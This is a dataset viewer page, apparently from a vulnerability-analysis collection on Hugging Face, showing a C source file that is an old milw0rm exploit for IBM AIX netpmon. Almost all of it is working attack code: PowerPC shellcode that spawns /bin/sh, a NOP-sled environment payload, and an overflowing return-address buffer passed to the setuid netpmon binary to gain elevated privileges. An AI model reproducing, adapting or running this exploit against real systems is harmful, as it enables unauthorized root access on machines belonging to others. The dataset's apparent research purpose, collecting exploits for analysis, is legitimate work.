Team Ai
Modelpublic

lilbool/vuln-code-analysis

sourceHugging Facemitupdated 2y agoView on Hugging Face
0likes
exploit_1044.txt99 linesDownload Raw Back to exploits
1/*

2 *

3 *    IBM AIX netpmon elevated privileges exploit

4 *

5 *    I just wanted to play with PowerPC (Tested on 5.2)

6 *

7 *    intropy (intropy <at> caughq.org)

8 *

9 */

10

11#include <stdio.h>

12#include <unistd.h>

13#include <stdlib.h>

14#include <string.h>

15

16#define DEBUG 1

17#define BUFFERSIZE 2048

18#define EGGSIZE 2048

19

20#define NOP 0x60

21#define ADDRESS 0x2ff22fff-(BUFFERSIZE/2)

22

23char shellcode_binsh[] =

24"\x7c\xa5\x2a\x79"     /* xor.    r5,r5,r5             */

25"\x40\x82\xff\xfd"     /* bnel    <shellcode>          */

26"\x7f\xe8\x02\xa6"     /* mflr    r31                  */

27"\x3b\xff\x01\x20"     /* cal     r31,0x120(r31)       */

28"\x38\x7f\xff\x08"     /* cal     r3,-248(r31)         */

29"\x38\x9f\xff\x10"     /* cal     r4,-240(r31)         */

30"\x90\x7f\xff\x10"     /* st      r3,-240(r31)         */

31"\x90\xbf\xff\x14"     /* st      r5,-236(r31)         */

32"\x88\x5f\xff\x0f"     /* lbz     r2,-241(r31)         */

33"\x98\xbf\xff\x0f"     /* stb     r5,-241(r31)         */

34"\x4c\xc6\x33\x42"     /* crorc   cr6,cr6,cr6          */

35"\x44\xff\xff\x02"     /* svca                         */

36"/bin/sh"

37"\x05";

38

39unsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {

40        int count, env_size = strlen(payload) + environment_size + 4 + 1;

41        unsigned long address, *ret_addressp;

42        

43        if (DEBUG) printf("Adding nops to environment buffer...");

44        for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {

45            *(env_buffer++) = NOP;

46        }

47        if (DEBUG) printf("size %d...\n", count);

48        if (DEBUG) printf("Adding payload to environment buffer...");

49        for ( count = 0; count < strlen(payload); count++ ) {

50            *(env_buffer++) = payload[count];

51        }

52        if (DEBUG) printf("size %d...\n", count);

53

54        env_buffer[env_size - 1] = '\0';

55

56        memcpy(env_buffer, "CAU=", 4);

57

58	memset(address_buffer, 'A', buffer_size);

59

60        address = ADDRESS;

61

62        if (DEBUG) printf("Going for address @ 0x%lx\n", address);

63

64        if (DEBUG) printf("Adding return address to buffer...");

65        ret_addressp = (unsigned long *)(address_buffer+3);

66        for ( count = 0; count < buffer_size; count += 4) {

67                *(ret_addressp++) = address;

68        }

69        if (DEBUG) printf("size %d...\n", count);

70

71        address_buffer[buffer_size - 1] = '\0';

72

73        return( 0 );

74}

75

76int main()

77{

78    char *buffer, *egg;

79    char *args[3], *envs[2];

80

81    buffer = (char *)malloc(BUFFERSIZE);

82    egg = (char *)malloc(EGGSIZE);

83

84    cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);

85

86    args[0] = "/usr/bin/netpmon";

87    args[1] = "-O";

88    args[2] = buffer;

89    args[3] = NULL;

90

91    envs[0] = egg;

92    envs[1] = NULL;

93

94    execve( "/usr/bin/netpmon", args, envs );

95

96    return( 0 );

97}

98

99// milw0rm.com [2005-06-14]